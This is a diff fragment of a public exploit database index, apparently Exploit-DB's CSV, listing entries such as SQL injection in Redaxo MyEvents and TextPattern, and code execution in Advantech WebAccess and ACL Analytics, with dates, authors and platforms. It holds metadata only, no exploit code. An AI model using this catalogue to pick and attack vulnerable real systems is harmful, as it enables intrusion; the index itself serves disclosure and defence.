 44261,exploits/php/webapps/44261.txt,"Redaxo CMS Addon MyEvents 2.2.1 - SQL Injection",2018-03-07,h0n1gsp3cht,webapps,php,80
 44262,exploits/java/webapps/44262.txt,"antMan 0.9.0c - Authentication Bypass",2018-03-07,"Joshua Bowser",webapps,java,3000
 44272,exploits/php/webapps/44272.txt,"Bacula-Web < 8.0.0-rc2 - SQL Injection",2018-03-09,"Gustavo Sorondo",webapps,php,
+44277,exploits/php/webapps/44277.txt,"TextPattern 4.6.2 - 'qty' SQL Injection",2018-03-12,"Manuel García Cárdenas",webapps,php,
+44278,exploits/windows/webapps/44278.py,"Advantech WebAccess < 8.3 - Directory Traversal / Remote Code Execution",2018-03-12,"Chris Lyne",webapps,windows,
+44281,exploits/windows/webapps/44281.txt,"ACL Analytics 11.X - 13.0.0.579 - Arbitrary Code Execution",2018-03-12,Clutchisback1,webapps,windows,